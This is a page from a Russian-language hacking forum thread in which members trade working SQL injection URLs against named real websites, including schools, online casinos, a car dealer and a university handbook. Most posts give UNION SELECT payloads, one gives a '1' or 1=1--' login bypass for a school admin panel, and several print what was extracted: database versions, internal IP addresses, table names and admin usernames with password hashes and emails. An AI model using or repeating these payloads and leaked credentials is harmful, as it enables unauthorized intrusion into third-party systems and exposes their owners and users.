ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5091  
Старый 15.03.2008, 00:37
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

2 Sleep

ВСЕ БОЯНЫ и не по одному разу!!!!!!

eutrainingsite.com

_http://forum.antichat.ru/showpost.php?p=577638&postcount=4681
_http://forum.antichat.ru/showpost.php?p=433407&postcount=2863

kino.ru

_http://forum.antichat.ru/showpost.php?p=572859&postcount=4635
_http://forum.antichat.ru/printthread.php?t=21336&page=116&pp=40
_http://forum.antichat.ru/showpost.php?p=315548&postcount=1216

eipcprograms.com

_http://forum.antichat.ru/showpost.php?p=616782&postcount=5131 -2 страницы назад
_http://forum.antichat.ru/showpost.php?p=594249&postcount=981

Блин какой смысл в антибояне?????
Зачем текст в первом посте???
Это конечно не моё дело,но давайте уважать друг друга в ветке и так >500 страниц
 
Ответить с цитированием

  #5092  
Старый 15.03.2008, 01:07
Аватар для t0ox
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию

Цитата:
http://www.maxkids.pl/?id_p=0+UNION+SELECT+1,2,3,4,5,6,7,8/*
http://www.maxkids.pl/?id_p=0+UNION+SELECT+version(),2,3,4,5,6,7,8/*
http://www.maxkids.pl/?id_p=0+UNION+SELECT+login,2,3,4,5,6,pass,8+from+u ser/*
PR: 4
4.0.22
Цитата:
http://www.badorgood.com/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
PR: 5
5.0.45-community-log

Германия Авто - официальный дилер Volkswagen (Фольксваген) в Рязани
Цитата:
http://www.germania-auto.ru/cars/?type=0&id=-1+union+select+1,version(),3,4,5,6,7/*
5.0.24-standard
Цитата:
http://www.eifeltour.de/index.php?type=subitem&item=uebernachtung&id=-1+union+select+version(),2/*
PR: 4
5.0.26
 
Ответить с цитированием

  #5093  
Старый 15.03.2008, 01:15
Аватар для FraiDex
FraiDex
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
Провел на форуме:
515368

Репутация: 135
Отправить сообщение для FraiDex с помощью ICQ
По умолчанию

Сайт какой то школы
http://www.cvsd.org/admin

в поле username: вводим
Код:
1' or 1=1--
и попадаем в админку

ЗЫ я думал эта бага уже в прошлом...

фаг.. уже прикрыли.

Последний раз редактировалось FraiDex; 15.03.2008 в 15:59..
 
Ответить с цитированием

  #5094  
Старый 15.03.2008, 04:09
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Кто хочет сорвать джек пот? четверка, таблы не брутил

Код:
http://www.epokerindex.com/poker_room_review_blank.php?roomId=-55+union+select+concat(version(),0x3a,user(),0x3a,database())/*
инфо

Цитата:
Warning: SQL: SELECT * FROM pDefaultRoomReview WHERE networkId = 4.1.11-Debian_4sarge7:db12688@10.1.3.19:db12688_epokerind ex LIMIT 1 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.11-Debian_4sarge7:db12688@10.1.3.19:db12688_epokerind ex LIMIT 1' at line 6 in /home/12688/domains/epokerindex.com/html/obj/obj_SQL.php on line 28

Последний раз редактировалось xcedz; 15.03.2008 в 04:12..
 
Ответить с цитированием

  #5095  
Старый 15.03.2008, 11:32
Аватар для Sleep
Sleep
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216

Репутация: 150
Отправить сообщение для Sleep с помощью ICQ
По умолчанию

Сорри,Сории,Сорри
Код:
http://www.columnists.com/index.php?ID=-11+union+select+1,2,3,4,5,6,table_name,8+from+information_schema.tables/*
Код:
http://www.eipcscreensavers.com/product.php?id=-11+union+select+1,version(),user(),4,5,6,7,database(),9,0,1,2,3/*
Код:
http://www.yogacenter.ru/page.php?id=-11+union+select+table_name,2,3,4,5+from+information_schema.tables/*
Код:
http://www.poweringmuscles.com/sports_science.php?id=-11+union+select+version()/*
Код:
http://jazz.koktebel.info/participant.php?id=-11'+union+select+1,2,3,4,5,6,version(),user()/*

Последний раз редактировалось Sleep; 15.03.2008 в 11:59..
 
Ответить с цитированием

  #5096  
Старый 15.03.2008, 12:26
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Еще одно казино ,кто выиграет не забудте про меня

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25/*

praetor_access@localhostraetor_cardwolves:5.0.27

Часть таблиц:

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25+from+infor mation_schema.tables+limit+16,1/*

abuse
admin_rights
admin_users

Таблица admin_users:

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25+from+info rmation_schema.columns+where+table_name=0x61646d69 6e5f7573657273+limit+0,1/*

user_id
user_active
user_name
user_email
user_password

И хеш суперадмина

_http://www.cardwolves.com/pokerlist.php?room=-7+union+select+1,concat(user_name,0x3a,user_passwo rd,0x3a,user_email),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+from+admin_users+l imit+0,1/*

superadmin:325c3ec0b351a639068d2fb913919bde:admin@ cardwolves.com

xcedz вдохновил(хотел репы добавить-не даёт)
 
Ответить с цитированием

  #5097  
Старый 15.03.2008, 16:08
Аватар для neon_fx
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

всем привет
http://www.goldsys.com/index.php?load=content&page_id=-23+union+select+1,2,user(),version(),database(),6, 7/*
gold@localhost
goldDB
4.1.20
 
Ответить с цитированием

  #5098  
Старый 15.03.2008, 17:55
Аватар для ReVOLVeR
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

_http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "2008 and 1=1--"]'

/CourseStructure.asp, line 2025
2008 and 1=1-- ON-LINE HANDBOOK
 
Ответить с цитированием

  #5099  
Старый 15.03.2008, 21:34
Аватар для ThreeD
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

http://www.brightstar.com.tw/product_info_e.php?UID=-772'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,concat_ws(0x3A3a,name,pwd),20,21,22,2 3,24,25,26,27,28,29,30,31,32,33+from+admin/*

�B���::*FEEF1A11AAEC0B57C55019116A56ACFA47B2 8417
���� ::*0DCC24D4F0A18E3B84417DC07EB08AEF1BE008E2
 
Ответить с цитированием

  #5100  
Старый 15.03.2008, 22:08
Аватар для beerhack
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

http://www.belanovsky.ru/links/ind.php?id_typ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,cust omerID,Login,cust_password,Email,first_name,last_n ame,subscribed4news,custgroupID,addressID,reg_date time,ActivationCode,CID),8,9,10,11,12,13,14,15+fro m+SS_customers/*

USER: u55631@10.10.223.230:
VERSION: 5.0.45-log:
DATABASE: u55631


1:admin:d2luZG93c21vYmlsZQ==:sassassas@rambler.ru: ::1:0:0:2007-03-01 16:26:01::3

Последний раз редактировалось beerhack; 16.03.2008 в 00:23..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ